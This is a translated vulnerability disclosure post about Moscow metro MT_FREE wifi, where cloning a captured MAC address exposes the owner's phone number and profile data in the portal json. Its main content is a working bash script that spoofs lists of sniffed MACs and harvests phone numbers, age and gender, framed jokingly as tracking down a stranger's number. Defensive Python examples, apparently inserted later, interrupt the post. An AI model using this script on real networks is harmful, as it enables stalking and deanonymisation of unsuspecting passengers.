How, once again, you can't get the phone number of (almost) any beauty in Moscow, or an interesting feature of MT_FREE

UPD0 03/14 8:21 - The phone number is no longer returned. The other interesting data is still there.

UPD1 03/14 10:39 - So as not to denigrate the guys from MaximaTelecom support: I reported it in a roundabout way, but I asked about it five times and checked whether my letter had reached the addressee; in short, I made sure it ended up with the (names asked not to be mentioned) person responsible for the wifi in the metro. I admit this was stupid, but the chain "problem in mosmetro" → "I already have contacts with everything mos-, I need to call them" seemed very, very logical to me at the time the vulnerability was found.

UPD2 03/14 15:40 - A vulnerability in the uid was found by Antxak: the uid is the unsalted md5 of the phone number, so phone numbers can be looked up again.

Example of a recovered phone number (screenshot)


UPD3 03/14 18:55 - The vulnerable hash in the uid has been replaced with the same one as in the phone field. At least until that one gets cracked too.
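The UPD2 and UPD3 notes above hinge on one property: a hash of an 11-digit phone number with no secret is not a pseudonym, because the input space is small enough to enumerate, so anyone holding the uid can confirm a guess. The following Python example is added here and is not part of the original post or the operator's code; it contrasts that scheme with a keyed pseudonym (HMAC under a server-side secret). The phone numbers and keys in it are constructed.

```python
import hashlib
import hmac
import secrets
from typing import Callable, Iterable, Optional

# Constructed sample numbers (not real subscribers). Russian mobile numbers
# are 11 digits starting with 7, so the whole space is only about 10^10 values.
SAMPLE_PHONES = ["79250000001", "79250000002", "79250000003"]


def md5_uid(phone: str) -> str:
    """Unsalted md5 of the number: the uid scheme the post describes."""
    return hashlib.md5(phone.encode()).hexdigest()


def keyed_uid(phone: str, key: bytes) -> str:
    """HMAC-SHA256 under a server-side secret: stable for the server,
    opaque to anyone who only sees the output."""
    return hmac.new(key, phone.encode(), hashlib.sha256).hexdigest()


def confirm_guess(uid: str, candidates: Iterable[str],
                  derive: Callable[[str], str]) -> Optional[str]:
    """Return the candidate whose derived id equals uid, or None.

    With md5_uid this check needs nothing but the uid, so the 10^10 number
    space is cheap to sweep; with keyed_uid it needs the server's key.
    """
    for phone in candidates:
        if hmac.compare_digest(derive(phone), uid):
            return phone
    return None


def demo():
    """Show both properties on the constructed sample set."""
    target = SAMPLE_PHONES[1]
    server_key = secrets.token_bytes(32)

    # Unsalted md5: the uid alone confirms which number it belongs to.
    recovered = confirm_guess(md5_uid(target), SAMPLE_PHONES, md5_uid)

    # Keyed pseudonym: without server_key no candidate can be checked,
    # even with the right number in the candidate list.
    other_key = secrets.token_bytes(32)
    not_recovered = confirm_guess(keyed_uid(target, server_key), SAMPLE_PHONES,
                                  lambda p: keyed_uid(p, other_key))

    # The server still gets the same identifier for the same user each time.
    stable = keyed_uid(target, server_key) == keyed_uid(target, server_key)
    return recovered, not_recovered, stable
```

A random per-user token stored server-side is better still, since then nothing is derived from the number at all; the keyed pseudonym is the minimum that keeps the uid stable without turning it into a lookup handle.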

UPD4 03/15 20:51 - The values and keys of almost all fields have been replaced with presumably obfuscated ones.

Example for UPD4
   "f1509df640" : "2808dfd5",
   "groups" : [
   "c760cf1502" : "1c0066f3",
   "2147e37a8a" : "159961e5",
   "5777de2cd9" : "fd5a4e2f",
   "tags" : [
   "843539b896" : "",
   "857696ce09" : "a5ff55e9",
   "train" : "",
   "5e97672e80" : "7dce1b03",
   "cec952789d" : null,
   "dmpSegments" : [],
   "place" : "",
   "f4befe4ab6" : "144:149",


In the Moscow metro there is a wonderful thing: free wifi.
The only thing you need to get in is your phone number. And since the metro is convenient but often a long ride, almost everyone uses the free network. In this interesting world, we took a liking to the girl at the opposite table.

Small vulnerability

Authorization in this network is tied to the MAC address, which can always be changed, for example to any one picked up from the air around you. MAC addresses can be captured with, for example, the airodump-ng utility. Sometimes you can even get onto the wifi without watching an ad, if the real owner of the MAC address has paid for premium access.

Leaking data about yourself

But if you are not among those who paid for wifi, then on connecting you are greeted with a page. In addition to advertising, this page hands out an interesting json containing a lot of information about the currently connected user.

Even if you have paid for premium access, this page can always be opened by simply typing its address in the browser.

A lot of interesting information
   "dmpSegments" : [],
   "clicker_status" : -1,
   "gender" : "F",
   "place" : "",
   "premium_groups" : {
      "premium_vip_status" : -1,
      "mosmetro_premium_short_status" : -1,
      "mosmetro_premium_status" : 1
   },
   "line_id" : "99",
   "family_status" : "not married",
   "autoapp_status" : 0,
   "premium" : true,
   "autoapp_user" : null,
   "age" : "4500",
   "interests" : "307",
   "train" : "",
   "device_price" : "",
   "mac" : "98-00-**-**-b3-66",
   "ip" : "",
   "groups" : [
   "home_station" : "192:193",
   "msisdn" : "7925*****03",
   "occupation" : "student",
   "profit" : "medium",
   "clicker" : null,
   "tags" : [
   "avocation" : "oywh4JCyQYOMHLy8ZM5AXqMZNhal0pDJl-OqBtuq09T5oBLS44GveLog8sWGm3ILB81zUC0mvW_l51J9ykx1kA==",
   "current_station" : null,
   "mnc" : "02",
   "uid" : "********",
   "job_station" : "57",
   "groups_data" : {
      "mosmetro_basic" : {
         "endDate" : null,
         "state" : 1
      },
      "mosmetro_premium" : {
         "state" : 1,
         "endDate" : null
      },
      "mgt_basic" : {
         "state" : 1,
         "endDate" : null
      },
      "cppk_basic" : {
         "endDate" : null,
         "state" : 1
      }
   }

Note that in the real data the phone number is not masked with asterisks.
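Given the fields above, the defender's first question is what the portal page needs to send to the browser at all. The Python below is an added example, not code from the post or from the network operator: it classifies the fields by name, also catches phone-number-shaped and MAC-shaped values whatever their key is called (so the key renaming noted in UPD4 changes nothing for that check), and shows the minimized object the page could ship instead. The sample json is constructed from the field names on the page with made-up values.

```python
import json
import re
from typing import Dict, List, Tuple

# Constructed sample modelled on the userData json shown in the post.
# Values are made up (the post masks them); nested objects are trimmed.
SAMPLE_USERDATA = json.dumps({
    "msisdn": "79250000000",
    "mac": "98-00-11-22-b3-66",
    "uid": "0123456789abcdef",
    "gender": "F",
    "age": "4500",
    "family_status": "not married",
    "occupation": "student",
    "profit": "medium",
    "home_station": "192:193",
    "job_station": "57",
    "line_id": "99",
    "premium": True,
    "groups_data": {"mosmetro_premium": {"state": 1, "endDate": None}},
    "dmpSegments": [],
})

# Fields that directly identify or contact the person.
DIRECT_IDENTIFIERS = {"msisdn", "mac", "uid"}
# Fields that profile the person; combined they narrow down who it is.
PROFILE_FIELDS = {"gender", "age", "family_status", "occupation", "profit",
                  "home_station", "job_station", "line_id", "interests",
                  "avocation", "device_price"}
# The only fields the captive portal page plausibly needs client-side.
NEEDED_BY_PORTAL = {"premium", "groups_data"}

PHONE_RE = re.compile(r"\+?7\d{10}")                       # Russian mobile number
MAC_RE = re.compile(r"([0-9a-f]{2}[-:]){5}[0-9a-f]{2}", re.I)


def audit_keys(userdata_json: str) -> Dict[str, List[str]]:
    """Classify the top-level fields of the portal json by name."""
    data = json.loads(userdata_json)
    report: Dict[str, List[str]] = {"direct": [], "profile": [], "needed": [], "other": []}
    for key in data:
        if key in DIRECT_IDENTIFIERS:
            report["direct"].append(key)
        elif key in PROFILE_FIELDS:
            report["profile"].append(key)
        elif key in NEEDED_BY_PORTAL:
            report["needed"].append(key)
        else:
            report["other"].append(key)
    return report


def identifier_like_values(userdata_json: str) -> List[Tuple[str, str, str]]:
    """Find values shaped like a phone number or a MAC, regardless of key name."""
    hits = []
    for key, value in json.loads(userdata_json).items():
        if not isinstance(value, str):
            continue
        if PHONE_RE.fullmatch(value):
            hits.append(("phone", key, value))
        elif MAC_RE.fullmatch(value):
            hits.append(("mac", key, value))
    return hits


def leaks_personal_data(userdata_json: str) -> bool:
    """Regression check for the portal page: True if a direct identifier
    reaches the client either by name or by shape."""
    return bool(audit_keys(userdata_json)["direct"]) or bool(identifier_like_values(userdata_json))


def minimized(userdata_json: str) -> str:
    """The most the page needs to render: subscription state, nothing personal."""
    data = json.loads(userdata_json)
    return json.dumps({k: v for k, v in data.items() if k in NEEDED_BY_PORTAL}, sort_keys=True)


def rename_keys(userdata_json: str) -> str:
    """Model the UPD4 change: opaque key names, same values (constructed names)."""
    data = json.loads(userdata_json)
    return json.dumps({f"k{i:02d}": v for i, v in enumerate(data.values())})
```

Running `leaks_personal_data` on the output of `rename_keys` still returns True: renaming keys hides the field names from a name-based check but the phone number and MAC are still in the response, which is why the check also looks at value shape.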

And now, actually, how to find out the beauty's number

I'm pretty sure you have all guessed how our script goes.

Eve really wants to know the phone number of Alice at the opposite table (forbidden love!). Like most people in Moscow with a phone, Alice also uses the MT_FREE network.

Eve has been following Alice for a while and learns her MAC using the airodump-ng utility, which is widely available and works on almost any wifi adapter. Having learned it, she goes down into the metro, changes her MAC to Alice's, opens the page and gets the desired number.

I'm too lazy to even check it

But wait, would-be Eve! To simplify the work of going through dozens of MACs from an eatery in search of a phone number, er, your painstaking study of wifi security, I wrote a little script! You can find it at the bottom of the article.

To be continued?

So far, getting user data only works in the metro, because remotely I still haven't managed to convince the server that my MAC is not 00:00:00:00:00:00. It used to be possible to pass the MAC in the client_mac parameter, but I haven't found an equivalent yet.


I reported the vulnerability (probably someone did it before me, the thing is obvious to the point of impossibility) a week ago and, having received no answer, decided to disclose it here.

Disclaimer: everything described above is written on behalf of a fictional character and is fiction. His motives do not coincide with mine, and I did this solely for research purposes. And I wouldn't even know what to do with the phone number of a beauty who didn't give it to me.

I won't point to a manual for airodump-ng, so as not to lower the bar to entry all the way to zero.


For those who just want to look
#!/bin/bash
# script for finding userdata from a list of macs.
# for educational purposes only, of course.

! sudo -p "we require sweet root juices to run, please let us in: " echo -n && exit 1

# interface to use; override with DEV=... in the environment (default wlp1s0)
DEV=${DEV:-wlp1s0}
# INPUT (file with one MAC per line) and SSID (network to join) are taken from
# the environment; their definitions did not survive on this page.
# USERDATA is the temporary file for the fetched json (default name assumed here).
USERDATA=${USERDATA:-.userdata}

OUTDIR=check-`date +%d-%m-%yT%H:%M:%S`

[ ! -e "$INPUT" ] && { echo 'no input'; exit 1; }
[ -z "$SSID" ] && { echo 'no connection'; exit 1; }

# print a status word and move the cursor back so the next one overwrites it
function progress() { echo -ne "\033[K"$1"\033["${#1}"D"; }
function status() { echo -e "\033[K$1"; }

function current_userdata() {
    rm .ck 2> /dev/null
    # first request picks up the portal cookies, the second pulls the userData
    # json out of the page (the portal URLs are not given on this page)
    curl --retry 3 -s -b .ck -c .ck '' > /dev/null 2>&1
    curl --retry 3 -s -b .ck -c .ck '' 2>/dev/null | grep userData | grep -oP '(?<=JSON.parse\(\").*?(?=\")' | sed 's/\\&quot;/"/g' | json_pp
    rm .ck
}

function oui() {
    # first three octets, upper case with dashes, as they are listed in oui.txt
    OUIMAC=$(echo "${1:0:8}" | tr ':a-f' '-A-F')
    if [ -e /var/lib/ieee-data/oui.txt ]; then
        MACINFO=`grep "$OUIMAC" /var/lib/ieee-data/oui.txt`
        # getting name (it's always 22 symbols away from the start)
        MACINFO=${MACINFO:22}
        # removing \r on the end
        echo -n "${MACINFO%$'\r'}"
    fi
}

tput civis

function on_exit() {
    tput cnorm
    echo "turning wifi back on"
    nmcli dev set $DEV managed true
    nmcli dev set $DEV autoconnect true
}

trap on_exit EXIT

mkdir $OUTDIR

echo "turning wifi on $DEV off for nmcli for now"

# turning it off in nmcli
nmcli dev set $DEV managed false >/dev/null 2>&1
nmcli dev set $DEV autoconnect false  >/dev/null 2>&1

for MAC in $(cat $INPUT); do
    echo -en "\033[2m"$MAC"\033[0m"' : '

    progress "switching..."
    sudo iw dev $DEV disconnect 2>/dev/null
    sudo ip link set $DEV down
    if ! sudo ip link set $DEV address $MAC > /dev/null 2>&1; then
        status "failed to set mac?"
        echo $MAC >> $OUTDIR/not-macs.txt
        continue
    fi
    sudo ip link set $DEV up

    progress "connecting..."

    # reset per MAC, otherwise a previous success would be carried over
    CON_SUCCESS=
    for try in {1..3}; do
        progress "try $try..."
        if sudo iw dev $DEV connect -w $SSID | grep connected >/dev/null 2>&1 ; then
            CON_SUCCESS=1
            break
        fi
    done

    if ! [ $CON_SUCCESS ]; then
        status "failed to connect to wi-fi"
        echo $MAC >> $OUTDIR/no-assoc-macs.txt
        continue
    fi

    progress "getting ip..."

    if ! sudo dhclient -1 $DEV; then
        status "DHCP failed"
        echo $MAC >> $OUTDIR/no-ip-macs.txt
        continue
    fi

    progress "userdata..."

    current_userdata 2>/dev/null > $USERDATA

    if [ -s $USERDATA ]; then

        AGE=`cat $USERDATA | grep -Po '(?<=age\"\ \:\ \").*?(?=\")'`
        PHONE=`cat $USERDATA | grep -Po '(?<=msisdn\"\ \:\ \").*?(?=\")'`
        PREMIUM=`cat $USERDATA | grep -Po '(?<=premium\"\ \:\ )\w*'`
        GENDER=`cat $USERDATA | grep -Po '(?<=gender\"\ \:\ \").*?(?=\")'`
        OUI=`oui $MAC`

        # just adding some more highlight to that sweet mark of ad-free wifi mac goodness
        if [ "$PREMIUM" == true ]; then
            echo $MAC >> $OUTDIR/good-macs.txt
        fi

        status "got userdata \033[36m{ msisdn: ${PHONE}, age group ${AGE}, gender: ${GENDER}, premium: ${PREMIUM}, vendor: $OUI }\033[0m "
    else
        status "no userdata"
        rm $USERDATA
        echo $MAC >> $OUTDIR/no-reg-macs.txt
    fi
done


Example of the script running (screenshot)

Link to the script on GitHub Gist

The script's only dependencies are curl and json_pp; it is also advisable to have a fresh oui.txt in /var/lib/ieee-data/ (download from here).

The default interface is wlp1s0.

./get-userdata returns user data for the current connection

Thanks for reading!

UPD: updated dependencies
UPD: replaced ifconfig with ip (thanks, bykvaadm), added the ability to change the interface without changing the script